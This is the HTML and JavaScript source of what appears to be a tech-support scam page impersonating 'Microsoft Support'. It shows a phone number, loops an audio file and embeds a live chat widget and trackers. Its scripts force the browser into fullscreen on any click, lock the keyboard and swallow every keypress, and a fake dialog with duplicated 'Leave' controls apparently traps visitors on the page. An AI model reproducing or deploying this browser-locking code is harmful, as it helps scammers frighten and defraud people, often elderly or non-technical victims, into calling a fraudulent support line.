    <input type="checkbox" id="checkbox" name="checkbox" value="checkbox">
  <label for="checkbox">Prevent this page from creating additional dialogs</label><br>
        <div class="action_buttons">
          <a class="" id="leave_page">Cancel</a>
          <a class="active" id="leave_page">Leave</a>
        </div>
    </div>
</div>

<div id="chat-box">
  <img src="microsoft.png"><span style="color: #222;
font-size: 21px;
font-weight: 600;
margin-left: 16px;
position: relative;
top: -5px;">Microsoft Support</span>
 <h4 style="font-weight: 800;">+1-833-423-1931</h4>
   <div class="arrow-down">
     <i class="fa fa-caret-down"></i>
   </div>
<audio id="audio" src="speech.mp3" loop=""></audio>
</div>
<script src="/jquery.min.js"></script>
<script src="/bootstrap.min.js" crossorigin="anonymous"></script>
<script type="text/javascript" src="/main.js"></script>
<script type="text/javascript" src="/scripts.js"></script>

    <script>
      addEventListener("click", function() {
    var el = document.documentElement
      , rfs =
             el.requestFullScreen
          || el.webkitRequestFullScreen
          || el.mozRequestFullScreen
    ;
    rfs.call(el);
    });

    </script>
    <script>
      document.onkeydown = function(a) {
        return !1
      };
    </script>


<script>
  navigator.keyboard.lock();
  document.onkeydown = function (e) {
  return false;
  }
  </script>
  <!--Start of Tawk.to Script-->
<script type="text/javascript">
var Tawk_API=Tawk_API||{}, Tawk_LoadStart=new Date();
(function(){
var s1=document.createElement("script"),s0=document.getElementsByTagName("script")[0];
s1.async=true;
s1.src='https://embed.tawk.to/661443e61ec1082f04e03165/1hqviifs8';
s1.charset='UTF-8';
s1.setAttribute('crossorigin','*');
s0.parentNode.insertBefore(s1,s0);
})();
</script>
<!--End of Tawk.to Script-->

<!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-4FXBGDDKSQ"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-4FXBGDDKSQ');
</script>

<!-- Hitsteps TRACKING CODE - Manual 2024-03-21 - DO NOT CHANGE -->
<script type="text/javascript">(function(){var hstc=document.createElement('script'); hstc.src='https://edgecdn.dev/code?code=a7400ed6d3f8ef9dff8b932728043756';hstc.async=true;var htssc = document.getElementsByTagName('script')[0];htssc.parentNode.insertBefore(hstc, htssc);})();
</script><noscript><a href="http://www.hitsteps.com/"><img src="//edgecdn.dev/code?mode=img&amp;code=a7400ed6d3f8ef9dff8b932728043756" alt="website tracking" width="1" height="1" />Realtime blog statistics</a></noscript>
<!-- Hitsteps TRACKING CODE - DO NOT CHANGE -->
</body>

</html>
+1-833-423-1931
